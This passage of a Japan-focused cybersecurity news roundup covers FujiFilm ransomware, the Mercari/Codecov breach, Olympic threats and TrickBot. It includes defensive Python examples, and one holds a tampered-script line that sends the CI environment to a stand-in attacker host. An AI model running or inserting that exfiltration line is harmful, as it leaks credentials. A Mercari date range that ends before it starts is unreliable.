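# inside 20 seconds, one non-document deletion by the same process, and two
# unrelated deletions by explorer.exe hours apart.
SAMPLE_EVENTS = [
    "2021-07-20T10:00:00\tsuspicious.exe\tC:\\Users\\taro\\Documents\\plan.docx",
    "2021-07-20T10:00:03\tsuspicious.exe\tC:\\Users\\taro\\Documents\\venues.xlsx",
    "2021-07-20T10:00:07\tsuspicious.exe\tC:\\Users\\taro\\Documents\\memo.jtd",
    "2021-07-20T10:00:11\tsuspicious.exe\tC:\\Users\\taro\\Documents\\notes.TXT",
    "2021-07-20T10:00:15\tsuspicious.exe\tC:\\Users\\taro\\Desktop\\passwords.csv",
    "2021-07-20T10:00:20\tsuspicious.exe\tC:\\Temp\\setup.log",
    "2021-07-20T10:00:25\tsuspicious.exe\tC:\\Temp\\installer.exe",
    "2021-07-20T09:15:00\texplorer.exe\tC:\\Users\\taro\\Downloads\\old.docx",
    "2021-07-20T11:42:10\texplorer.exe\tC:\\Users\\taro\\Downloads\\draft.txt",
]

if __name__ == "__main__":
    for process, count in find_mass_deleters(SAMPLE_EVENTS).items():
        print(f"ALERT: {process} deleted {count} document-type files within 60s")
```

The threshold and window are tuning knobs: a 60-second window with five documents is low enough to catch a wiper early but high enough that a user emptying a folder does not trip it every time. Feeding real telemetry means replacing `parse_event` with the parser for the log format in use; the sliding-window logic stays the same.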

Yoshikawa added, "This is the type of attack we should be most concerned about for the Tokyo Olympics, and we need to continue keeping a close eye on this." 

Fraudulent streaming sites have also become a major concern for the Games, especially now that COVID-19 restrictions have all but barred spectators. The sites, which surface when users search for Olympic-related terms on search engines such as Google, ask visitors to accept browser notifications so that malicious advertising can then be pushed to them. Trend Micro has already identified numerous sites of this kind. 

In Japan, Olympic content is streamed free of charge on two official platforms: one operated by public broadcaster NHK and the other, TVer, run by commercial broadcasters. No other streaming services are licensed in the country. 

Trend Micro warns that clicking those links can expose users to attack and advises viewers to watch the Olympics only on officially recognized sites. Fake Olympics websites with key terms such as "Tokyo" or "2020" in their domain names are another concern. In a probable phishing attack, the login details of ticket purchasers and volunteers were also exposed online. Organizers are urging caution in light of these threats.

FujiFilm Shuts Down Network Following Ransomware Attack

Japanese multinational conglomerate FujiFilm, headquartered in Tokyo, suffered a ransomware attack on Tuesday night. As a precaution, the company has shut down parts of its network to stop the attack from spreading. 

"FUJIFILM Corporation is currently carrying out an investigation into possible unauthorized access to its server from outside of the company. As part of this investigation, the network is partially shut down and disconnected from external correspondence," the company said in a statement.

FujiFilm is best known for its digital imaging products but also makes high-tech medical equipment, including devices for the rapid processing of COVID-19 tests. Because of the partial network outage, FUJIFILM USA has posted a notice on its website stating that it is experiencing network problems affecting its email and phone systems. 

“We want to state what we understand as of now and the measures that the company has taken. In the late evening of June 1, 2021, we became aware of the possibility of a ransomware attack. As a result, we have taken measures to suspend all affected systems in coordination with our various global entities. We are currently working to determine the extent and the scale of the issue. We sincerely apologize to our customers and business partners for the inconvenience this has caused,” FujiFilm further added. 

Threat hunting and cyber intelligence firm Group-IB estimated that the number of ransomware attacks grew by more than 150% in 2020 and that the average ransom demand increased more than twofold to $170,000.

While FUJIFILM has not stated what ransomware group is responsible for the attack, Advanced Intel CEO Vitali Kremez has told BleepingComputer that FUJIFILM was infected with the Qbot trojan last month.

"Based on our unique threat prevention platform Andariel, FUJIFILM Corporate appeared to be infected with Qbot malware based on May 15, 2021. Since the underground ransomware turmoil, the Qbot malware group currently works with the REvil ransomware group. A network infection attributed to QBot automatically results in risks associated with future ransomware attacks," Kremez told BleepingComputer.

Last week, hackers targeted Japanese government organizations by gaining access to Fujitsu's ProjectWEB project management platform, resulting in data leaks from several government offices. One ministry had at least 76,000 email addresses exposed, including those of individuals outside the ministry.

Japanese E-Commerce Platform Mercari Suffers Major Data Breach

Mercari, an e-commerce platform, has disclosed a major data breach that occurred as a result of the Codecov supply-chain attack. Mercari is a publicly listed Japanese online marketplace that has recently expanded its operations to the United States and the United Kingdom. 

As of 2017, the Mercari app had been installed by over 100 million people around the globe, making the firm the first in Japan to achieve unicorn status. 

The popular code coverage tool Codecov was a victim of a supply-chain attack that lasted for two months. During this two-month period, the attackers have modified the legitimate Codecov Bash Uploader tool to exfiltrate environment variables (containing sensitive information such as keys, tokens, and credentials) from Codecov customers’ CI/CD environments. 

Using credentials harvested through the tampered Bash Uploader, the Codecov attackers went on to breach hundreds of customer networks. Mercari has now disclosed a significant impact from the Codecov supply-chain attack on its customer data, confirming that the breach exposed tens of thousands of records, including financial details, to threat actors. 
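The root of the exposure described above is a CI job that fetches a helper script over the network and executes it as-is, so that any lines an attacker has appended run with the job's environment (tokens, keys, credentials) in reach. The following is an added example, not Codecov's uploader and not Mercari's pipeline code: it pins the script to a SHA-256 digest and refuses to execute a copy that does not match, and it lists the environment variable names a leaked `env` dump would have handed over, which is the starting point for scoping a credential rotation. The script bodies, the environment dictionary, and the `attacker.example` host are constructed for the demonstration; in practice the pinned digest comes from a vendor-published checksum and lives in the repository.

```python
"""Pin and verify a network-fetched CI helper script before running it.

Added example, not Codecov's uploader and not Mercari's pipeline code.
It addresses the failure described above: a CI job that downloads a
script and executes it unchecked also executes whatever an attacker has
appended, with the job's environment (tokens, keys) in reach.  The script
bodies, the environment dictionary and the attacker host are constructed
for the demonstration; the digest would normally be pinned in the
repository from a vendor-published checksum.
"""
import hashlib
import hmac
import re
import subprocess


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the script bytes; this is the value to pin."""
    return hashlib.sha256(data).hexdigest()


def verify_script(data: bytes, pinned_sha256: str) -> bool:
    """True only if the bytes match the pinned digest (constant-time compare)."""
    return hmac.compare_digest(sha256_hex(data), pinned_sha256.strip().lower())


def run_pinned(data: bytes, pinned_sha256: str) -> int:
    """Feed the script to bash only after the pin check passes."""
    if not verify_script(data, pinned_sha256):
        raise RuntimeError("uploader digest mismatch; refusing to execute")
    return subprocess.run(["bash", "-s"], input=data, check=False).returncode


# Variable names a leaked `env` dump would hand an attacker; used to scope rotation.
SECRET_NAME_RE = re.compile(r"TOKEN|SECRET|PASSW(OR)?D|API_KEY|ACCESS_KEY|PRIVATE_KEY", re.I)


def sensitive_env_names(env: dict) -> list:
    """Sorted names of environment variables that look like credentials."""
    return sorted(name for name in env if SECRET_NAME_RE.search(name))


# Constructed stand-ins: a benign helper script and a copy with an appended
# line that posts the job's environment to a (hypothetical) attacker host.
GOOD_SCRIPT = b"#!/usr/bin/env bash\necho 'uploading coverage report'\n"
TAMPERED_SCRIPT = GOOD_SCRIPT + b'curl -s -d "$(env)" https://attacker.example/ || true\n'

# Constructed CI environment.
CI_ENV = {
    "PATH": "/usr/bin:/bin",
    "HOME": "/home/runner",
    "GITHUB_TOKEN": "ghp_example",
    "AWS_SECRET_ACCESS_KEY": "example",
    "DB_PASSWORD": "example",
}

if __name__ == "__main__":
    pin = sha256_hex(GOOD_SCRIPT)  # in practice: the vendor-published checksum
    print("pinned digest:", pin)
    print("good copy matches pin:", verify_script(GOOD_SCRIPT, pin))
    print("tampered copy matches pin:", verify_script(TAMPERED_SCRIPT, pin))
    print("names a leaked env dump would expose:", sensitive_env_names(CI_ENV))
    run_pinned(GOOD_SCRIPT, pin)
```

A tampered download fails the digest check before a single line runs, which is exactly the step the unchecked `curl | bash` pattern skips. The name-based secret scan is deliberately broad: after an `env` exfiltration every match should be treated as compromised and rotated, and the pipeline itself should be tightened so that jobs only receive the variables they need.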

According to Mercari, the investigation found that the following data was compromised: 

• 17,085 records related to the transfer of sales proceeds to customer accounts between August 5, 2014, and January 20, 2014. The leaked data included bank code, branch code, account number, account holder name (in kana), and transfer amount. 

• 7,966 records on Mercari and Merpay business partners, including names, dates of birth, affiliations, e-mail addresses, and more. 

• 2,615 records on employees, including some at Mercari: employee names, company e-mail addresses, employee IDs, phone numbers, dates of birth, and other information as of April 2021. 

• Details of former staff, vendors, and external company employees who handled 217 Mercari customer service support cases between November 2015 and January 2018. 

• Customer information exposed includes name, address, e-mail address, phone number, and inquiry details. 

• 6 records related to a May 2013 incident. 

Mercari became aware of the consequences of the Codecov breach shortly after Codecov's initial disclosure in mid-April.

Mercari was also notified by GitHub on April 23 of suspicious activity on Mercari's repositories linked to the incident. Having found that a malicious third party had obtained and used its authentication credentials, the company immediately revoked the compromised credentials and secrets while continuing to investigate the full scope of the breach.

"At the same time as this announcement, we will promptly provide individual information to those who are subject to the information leaked due to this matter, and we have also set up a dedicated contact point for inquiries regarding this matter," Mercari stated in its original press release.

"In the future, we will continue to implement further security enhancement measures and investigate this matter while utilizing the knowledge of external security experts, and will promptly report any new information that should be announced. We sincerely apologize for any inconvenience and concern caused by this matter," the company further added.

Tokyo Gas Discloses Data Breach Impacting Anime-style Dating Simulation Game

Tokyo Gas, the Japanese utility giant that also developed the game, has reported a cyber attack in which around 10,000 email addresses belonging to players of an online anime-style game were exposed. 

In a security alert published on January 30, the company said it had disabled the game's website and mobile app (the game is a dating simulation) after discovering that a third party had gained unauthorized access to the system and to players' email addresses and associated nicknames. 

The game's name translates as 'Furo Koi: My Only Bath Butler'; the parent company describes it as a 'romance game'. It belongs to the Japanese role-playing genre in which users build relationships with in-game characters, mainly through conversations in the app. 

The Japanese-language security alert indicates that the game also doubles as a showcase for the comparative effectiveness of various bathing products, and a video posted on the game's Twitter account shows a range of anime avatars. 

Tokyo Gas, founded in 1885, is Japan's largest natural gas provider. According to the company, 10,365 email addresses were exposed when the attack took place on January 29. 

A company spokesperson said at a press briefing that the breach was discovered the following day, January 30. The company does not yet know whether the stolen data has been misused. 

The security alert also mentions the addition of a new feature to the game on January 28, but it is unclear what connection, if any, this has to the breach. 

It also states that measures in response to the attack have been taken, that law enforcement has been involved, and that further security measures will be implemented based on the findings of a security audit. 

The Tokyo Gas spokesperson said: “We recognize that the protection of customer information is extremely important. We sincerely apologize for any inconvenience caused to our customers”.

UK National Cyber Security Centre Reveals Russia’s Plan to Disrupt Tokyo Olympics

The UK National Cyber Security Centre recently revealed that Russian military intelligence had been preparing a cyber-attack on the Tokyo Olympics and Paralympics in an attempt to disrupt the 'world's premier sporting event'. 

The Russian cyber-reconnaissance work covered the Games' organizers, logistics services, and sponsors, and was under way before the Olympics were postponed because of Covid-19. 

The disclosure is the first indication that Russia was prepared to go as far as disrupting the summer Games, from which all Russian competitors had been barred over persistent state-sponsored doping offences. 

The Kyodo news agency reported that a senior Japanese government official said Tokyo would consider lodging a protest with Moscow if cyber-attacks were confirmed to have been carried out by Russia. 

Japan's chief government spokesman, Katsunobu Kato, said the country would do everything possible to ensure that the postponed Games are free from any cyber-attack. 

“We would not be able to overlook an ill-intentioned cyber-attack that could undermine the foundation of democracy,” Kato stated, adding that Japanese authorities were gathering information and would continue to share it with other countries. 

The UK government said it assessed with 95% confidence that GRU Unit 74455 was behind the attack on the 2018 Winter Games and the targeting of the summer Games, carried out remotely. 

In PyeongChang, according to the UK, the GRU's cyber unit tried to disguise itself as North Korean and Chinese hackers when it targeted the opening ceremony of the 2018 Winter Games, taking down the website so spectators could not print tickets and crashing the Wi-Fi in the stadium. 

Key targets of the 2018 attacks also included broadcasters, a ski resort, Olympic officials, service providers, and sponsors, meaning the targets were not only in Korea.

The foreign secretary, Dominic Raab, stated: “The GRU’s actions against the Olympic and Paralympic Games are cynical and reckless. We condemn them in the strongest possible terms.” 

He added that “the UK will continue to work with our allies to call out and counter future malicious cyber-attacks.” 

The UK's allegations are believed to be part of an effort to blunt Russia's cyber threat through maximum exposure and to deter any disruption of the rescheduled summer Games next year.

India And Japan Agree on The Need for Robust and Resilient Digital and Cyber Systems

India and Japan have finalized a cybersecurity agreement, with both sides agreeing on the need for robust and 'resilient digital and cyber systems'. 

The wide-ranging agreement provides for cooperation in 5G technology, AI, and a variety of other critical areas, as the two strategic partners pledged to broaden their ties, including in the Indo-Pacific region. 

The foreign ministers of the two nations – S Jaishankar of India and Motegi Toshimitsu of Japan – were of the view that a free, open, and inclusive Indo-Pacific region “must be premised on diversified and resilient supply chains."

The two ministers “welcomed the Supply Chain Resilience Initiative between India, Japan, Australia, and other like-minded countries." 

The initiative comes as countries look to shift supply chains away from China after Beijing abruptly shut factories and plants in the wake of the coronavirus pandemic, sending economic activity into a slump. 

The move raised questions about the reliability of supply chains based in China, with countries looking to diversify their sources of critical procurement. In September, the trade ministers of India, Australia, and Japan had agreed to launch an initiative on supply chain resilience.


Jaishankar said in a tweet that further expansion of India-Japan cooperation in third countries, centred on development projects, also featured in the thirteenth India-Japan foreign ministers' strategic dialogue.

The two “welcomed the finalization of the text of the cybersecurity agreement. The agreement promotes cooperation in capacity building, research, and development, security and resilience in the areas of Critical Information Infrastructure, 5G, Internet of Things (IoT), Artificial Intelligence (AI), among others," the statement said. 

In New Delhi, the agreement was cleared at a Cabinet meeting chaired by Prime Minister Narendra Modi, according to Information and Broadcasting Minister Prakash Javadekar. 

The ministers agreed that the next annual bilateral summit between the leaders of India and Japan would be hosted by the Indian government “at a mutually convenient time for the two Prime Ministers."

Alert! TrickBot Trojan and Ryuk Ransomware spreads through Japan, as the holiday season approaches


TrickBot, the most dangerous and active banking trojan family according to IBM X-Force data, has lately been modifying its malware's modules as the threat group launches new campaigns in the wild. As the infection campaign spreads around the globe, Japan has become its newest target ahead of the holiday season. TrickBot campaigns usually focus on European and Western countries and other parts of the world just before the holidays, but this is the first time they have focused on Japan.


The timing coincides with the holiday season, when consumers shop extensively. Japanese consumers should therefore be wary of these infections, which target banks, online shopping payment cards, telecom services, a bitcoin exchange, e-wallets, and others. TrickBot has been loaded with hundreds of targeted URLs belonging to banks and other retailers, and the Emotet botnet is also dropping TrickBot onto infected devices.

The most common attack involves web injections on bank websites, leading to banking fraud. The on-the-fly injections TrickBot uses lure the victim into revealing personally identifiable information (PII), payment card details, and PIN codes. This is not the first time Eastern European gangs have attacked the country; other trojans such as URLZone and Gozi (Ursnif) have been prevalent in Japan for years.

For Japanese Businesses - Beware! Not only TrickBot but Ryuk Ransomware is also spreading through the region

TrickBot, already a worrisome banking plague, is not limited to banking fraud.

Japanese companies should also be wary of the growing number of ransomware attacks, because a TrickBot infection can usher in a Ryuk ransomware attack. The kill chain starts with Emotet, which drops TrickBot, and ends with Ryuk, ransomware that locks systems and demands millions of dollars. If a Ryuk or TrickBot infection is suspected, launch the incident response plan immediately and contain the infection, or bring in a security firm without delay, because these infections spread fast and wide.